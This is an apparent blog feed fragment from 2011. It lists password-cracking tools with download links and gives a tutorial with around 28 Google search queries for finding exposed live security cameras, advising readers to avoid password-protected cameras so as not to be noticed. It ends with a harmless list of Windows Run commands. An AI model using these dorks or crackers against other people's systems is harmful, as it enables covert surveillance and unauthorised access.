&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Brutus is a remote online password cracker for windows, good for HTTP,POP3,FTP,SMB,Telnet and lots others.. it&#39;s also free. It is available for Windows 9x, NT and 2000, there is no UN*X version available although it is a possibility at some point in the future. Brutus was first made publicly available in October 1998 and since that time there have been at least 70,000 downloads and over 175,000 visitors to this page. Development continues so new releases will be available in the near future. Brutus was written originally to help me check routers etc. for default and common passwords,I have also made a post on &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Brute force&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Password Cracking explained&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt; alternatively you can&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;b&gt;&lt;a href=&quot;http://www.hoobie.net/brutus/brutus-download.html&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Download Brutus Password Cracker Here&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;RainbowCrack:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;A very nice Hacking tools.Its general propose implementation of Philippe Oechslin&#39;s faster time-memory trade-off technique. It cracks hashes with rainbow tables,&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Features:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Full time-memory tradeoff tool suites, including rainbow table generation, sort, conversion and lookup&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Support rainbow table of any hash algorithm&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Support rainbow table of any charset&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Support rainbow table in raw file format (.rt) and compact file format (.rtc)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Computation on multi-core processor support&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Computation on GPU (via NVIDIA CUDA technology) support&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Computation on multi-GPU (via NVIDIA CUDA technology) support&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Runs on Windows XP 32-bit, Windows Vista 32-bit and Windows 7 32-bit&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Command line and graphics user interface&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;a href=&quot;http://project-rainbowcrack.com/&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Download Rainbow Cracker Here&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;LC5(LophtCrack):&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Windows password auditing and recovery application &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;L0phtCrack or LC5&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt; attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, then re-acquired by the original L0pht guys and reborn as LC6 in 2009.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;b&gt;&lt;a href=&quot;http://www.l0phtcrack.com/&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Download LC5 here&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;John the Ripper:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;A powerful, flexible, and fast multi-platform password hash cracker John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Here&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;and&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt; &lt;/span&gt;&lt;b&gt;&lt;a href=&quot;http://www.openwall.com/john/&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;download &amp;nbsp;john ripper here&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/1851939672019827467/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/free-essential-hacking-tools.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/1851939672019827467'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/1851939672019827467'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/free-essential-hacking-tools.html' title='Free Essential Hacking tools'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1LJ4FvXl35rK-xXHD6eXk2PFDYfg8ezrGCCOUe0vBEGClbD_PKhJopoBHId3LbfzCl445BiWvRoTvmdzfV29j4R57rHzlNBsKiMhZn_VJr2IhvRVxQ9iNDxwi9ARdKBHhbFJUS5ACGgs/s72-c/wolfgang-router2-pic1.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-7702486460674479182</id><published>2011-05-07T23:56:00.001-07:00</published><updated>2011-05-07T23:56:55.565-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CCTv hack"/><title type='text'>How to watch Security Cameras on Internet CCtv Camera hacking</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;There are Some Steps &lt;strong&gt;“How to watch Security Cameras on Internet”&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;1. &lt;/strong&gt;&lt;strong&gt;Open up your web browser&lt;/strong&gt;&lt;strong&gt;.&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;2. &lt;/strong&gt;&lt;strong&gt;Go to a search engine of your choice (i&lt;/strong&gt;&lt;strong&gt;.e. Google, Yahoo, etc.), and input any of the search queries listed below.&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;3. &lt;/strong&gt;&lt;strong&gt;After you Google one of these queries, you will see some search results, click on any one of them&lt;/strong&gt;&lt;strong&gt;.&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;4. &lt;/strong&gt;&lt;strong&gt;Depending on the type of camera that you have access to, you may be able to zoom, pan, and tilt the camera to see what you want to&lt;/strong&gt;&lt;strong&gt;.&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;5. &lt;/strong&gt;&lt;strong&gt;Do not try to get onto password protected cameras, as this will not go unnoticed if too many attempts are made&lt;/strong&gt;&lt;strong&gt;.&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div sizcache=&quot;10&quot; sizset=&quot;33&quot;&gt;&lt;strong sizcache=&quot;10&quot; sizset=&quot;33&quot;&gt;&lt;a href=&quot;http://kyrionhackingtutorials.com/blog/wp-content/uploads/2010/05/cctvImages.jpg&quot; jquery1292952065515=&quot;34&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/div&gt;&lt;strong&gt;&lt;em&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Some Commands to be Remember to Find Live CCTV Cameras .&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;&lt;em&gt;&lt;img src=&quot;http://3.bp.blogspot.com/_CE8mdy3irbg/SUNcAe8gk2I/AAAAAAAAGww/WKnoOsF63zs/s200/cctv-vectors-preview-sm.gif&quot; /&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;inurl:/view.shtml&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:”Live View / – AXIS” | inurl:view/view.shtml^&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;inurl:ViewerFrame?Mode=&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;inurl:ViewerFrame?Mode=Refresh&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;inurl:axis-cgi/jpg&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;inurl:view/index.shtml&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;inurl:view/view.shtml&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;liveapplet&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:liveapplet&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;allintitle:”Network Camera NetworkCamera”&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:axis intitle:”video server”&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:liveapplet inurl:LvAppl&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:”EvoCam” inurl:”webcam.html”&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:”Live NetSnap Cam-Server feed”&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:”Live View / – AXIS 206M”&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:”Live View / – AXIS 206W”&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:”Live View / – AXIS 210″&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;inurl:indexFrame.shtml Axis&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:start inurl:cgistart&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:”WJ-NT104 Main Page”&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:snc-z20 inurl:home/&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:snc-cs3 inurl:home/&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:snc-rz30 inurl:home/&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:”sony network camera snc-p1″&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;viewnetcam.com&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:”Toshiba Network Camera” user login&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;strong&gt;&lt;em&gt;intitle:”i-Catcher Console – Web Monitor”&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/7702486460674479182/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/how-to-watch-security-cameras-on.html#comment-form' title='15 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/7702486460674479182'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/7702486460674479182'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/how-to-watch-security-cameras-on.html' title='How to watch Security Cameras on Internet CCtv Camera hacking'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_CE8mdy3irbg/SUNcAe8gk2I/AAAAAAAAGww/WKnoOsF63zs/s72-c/cctv-vectors-preview-sm.gif" height="72" width="72"/><thr:total>15</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-6280301039803805817</id><published>2011-05-07T23:54:00.000-07:00</published><updated>2011-05-07T23:54:53.173-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking Commends"/><title type='text'>Windows sortcut command</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Go to &lt;strong&gt;Start&lt;/strong&gt; Menu – &lt;strong&gt;Run&lt;/strong&gt; and&lt;em&gt; type in the command&lt;/em&gt; to run the specific application. Command are in front of the Program, while program names are first in the list. So, It comes in handy if you have the list of all programs with you.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;strong&gt;Run command increases you productivity&lt;/strong&gt; and saves lot of time as you don’t require to access start menu to launch any application or system utility.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;strong&gt;Run Commands Listed below In Alphabetical Order&lt;/strong&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;To search Press &lt;strong&gt;Ctrl +F&lt;/strong&gt; &amp;amp; type the Action you need to do.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;5&quot; style=&quot;width: 650px;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td width=&quot;360&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;strong&gt;Program&lt;/strong&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/span&gt;&lt;/td&gt;&lt;td width=&quot;360&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;strong&gt;Run Command&lt;/strong&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td width=&quot;360&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Accessibility Controls&lt;/span&gt;&lt;/td&gt;&lt;td width=&quot;360&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;access.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Accessibility Wizard&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;accwiz&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Add Hardware Wizard&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;hdwwiz.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Add/Remove Programs&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;appwiz.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Administrative Tools&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;control admintools&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Adobe Acrobat ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;acrobat&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Adobe Distiller ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;acrodist&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Adobe ImageReady ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;imageready&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Adobe Photoshop ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;photoshop&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Automatic Updates&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;wuaucpl.cpl&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Basic Media Player&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;mplay32&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Bluetooth Transfer Wizard&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;fsquirt&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Calculator&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;calc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Ccleaner ( if installed )&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;ccleaner&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C: Drive&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;c:&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Certificate Manager&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;cdrtmgr.msc&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Character Map&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;charmap&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Check Disk Utility&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;chkdsk&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Clipboard Viewer&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;clipbrd&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Command Prompt&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style=&quot;font-family: Verdana,sans-serif;&quot;&gt;cmd&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
